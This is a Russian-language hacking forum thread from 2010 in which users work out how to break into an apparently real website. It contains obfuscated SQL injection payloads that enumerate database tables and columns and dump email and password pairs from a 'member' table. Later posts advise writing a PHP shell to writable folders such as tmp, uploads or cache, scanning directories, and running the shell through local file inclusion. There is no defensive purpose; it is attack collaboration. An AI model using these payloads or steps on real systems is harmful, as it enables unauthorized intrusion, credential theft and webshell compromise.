ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.05.2010, 20:54
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
id=2/**/and/**/1=0/**//*!union+select+1,2,table_name,4+from+information_s chema.tables*/--
|
|
|
28.05.2010, 20:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Iceangel_ & pinch
не катит (
вот интересно information_schema. columns работает а information_schema. tables не работает
брутил имя таблицы "member"
и вот такой запрос получилось
id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,column_name,4+from+/*!information_schema.columns*/+/*!where*/+/*!table_name*/=/*!CHAR*/(109,101,109,98,101,114)
...
Hasta la vista baby
id=2/**/and/**/1=0/**//*!union*/+/*!select*/+1,2,aes_decrypt(aes_encrypt(concat(Email,0x3a,Pas sword),1),1),4+from+/*!member*/
Последний раз редактировалось Konqi; 28.05.2010 в 21:20..
|
|
|
|
28.05.2010, 21:20
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
есть sql, хочу создать пхп файл
1. file_priv=Y
2. magic_quotes_gpc=off
3. есть полный путь
4. есть папка icons
читаю файлики с помощью load_file, но создать файл не выходит в чем может быть проблема?
|
|
|
|
28.05.2010, 21:22
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
pinch
a в папке icons есть права на запись? |
|
|
|
28.05.2010, 21:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?
|
|
|
|
28.05.2010, 21:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pinch
видимо нет=))) что можно сделать, поискать папки на запись? или можно еще чтото сделать?
первый вариант, смотри на папки типа template
|
|
|
|
28.05.2010, 22:04
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
pinch, посканьте сайт каким-нить сканером директорий, затем методом тыка поищите каталог на запись
|
|
|
|
28.05.2010, 22:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
pinch посмотри если сайт на кмс построен, соответсвенно скачай и посмотри какие папки есть и пробуй всe, ну и конечно пробуй папки: store, tmp,temp,img,im,admin,adm,cache,images,upl,uploads ........etc... если в них нет ограничений по исполнению в .htaccess
|
|
|
|
28.05.2010, 22:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
pinch
если система linux то попробуй записать в папке /tmp
думаю права хватит
|
|
|
|
29.05.2010, 00:02
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
